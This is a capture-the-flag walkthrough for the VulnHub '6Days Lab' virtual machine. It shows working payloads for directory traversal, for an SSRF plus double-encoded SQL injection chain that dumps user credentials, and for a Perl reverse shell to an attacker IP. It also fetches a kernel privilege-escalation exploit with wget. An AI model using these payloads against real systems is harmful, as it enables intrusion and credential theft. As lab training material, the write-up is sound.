table of Contents
Account password configuration file
View apache default configuration information
Get the table in the current database
Get the field name in the table
Obtain the required account and password information
Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- 6Days_Lab-v1.0.1.ova (Size: 682 MB)
- Download: https://goo.gl/fwuRJ1
- Download (Mirror): https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova
- Download (Torrent): https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova.torrent ( Magnet)
collect message
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 62:ac:77:11:79:9a:21:64:c2:88:c0:87:7d:19:34:05 (DSA)
| 2048 cb:24:63:a9:7c:bc:7b:e9:a8:2a:d1:9f:4d:6a:a0:07 (RSA)
|_ 256 13:e5:dd:7b:a5:f2:bf:41:71:dd:88:40:7f:5f:5d:7b (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Rashomon IPS - Main Page
8080/tcp filtered http-proxy
MAC Address: 00:0C:29:C1:0F:DC (VMware)
Enter the discount code to prompt expiration
Directory traversal
View page source code
File contains
Src function is called
Account password configuration file
<?php
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
passwd information
user:x:1000:1000:user,,,:/home/user:/bin/bash
andrea:x:1001:1001::/home/andrea:/bin/andrea
View apache default configuration information
In the apache default file, it is found that the website is actually on port 8080, only local connections are accepted, and then forwarded to port 80
GET /image.php?src=../../../../etc/apache2/sites-available/default
Python
Through the configuration information and the information obtained, it can be found that the website is directly connected to the mysql database, there is SQL injection, and the url encoding can be bypassed twice
Generate sql statements through Python
Enter python3 to enter the python3 environment
from urllib.parse import quote, introduce the url encoding in the quote module
quote(quote("SQL statement")), two URL-encoded SQL statements
For example: quote(quote("aaaa'union select version(),2#")) to obtain the current database version information
'aaaa%2527union%2520select%2520version%2528%2529%252C2%2523'
payload:image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520version%2528%2529%252C2%2523
Injection via ssrf+sql
GET /image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520database%2528%2529%252C2%2523
Get the table in the current database
payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528table_name%2529%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2523
Get the field name in the table
payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528column_name%2529%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2523
Obtain the required account and password information
payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528username%252C%2527~~~~%2527%252Cpassword%2529%252C2%2520from%2520fancydb.users%2523
You have %andrea~~~~SayNoToPentests discount!
SSH
Get the password information of the andrea account, open the ssh port, and try to connect using ssh
After connecting, I found no response to any commands
perl reverse shell
andrea@cypm:~$ perl -e 'use Socket;$i="192.168.243.133";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
$ python -c 'import pty;pty.spawn("/bin/bash");'
andrea@cypm:~$
Kernel privilege escalation
Search exp
root@kali:~# gcc /root/37292.c -o exp
root@kali:~# python -m SimpleHTTPServer 443
andrea@cypm:/tmp$ wget http://192.168.243.133:443/exp
Reference link
https://www.cnblogs.com/sym945/p/12154220.html
https://www.cnblogs.com/sym945/p/12154220.html
https://blog.csdn.net/qq_43746825/article/details/86909612
https://blog.csdn.net/weixin_44740377/article/details/106097285
https://blog.csdn.net/Kevinhanser/article/details/87887051
https://www.vulnhub.com/entry/6days-lab-11,156/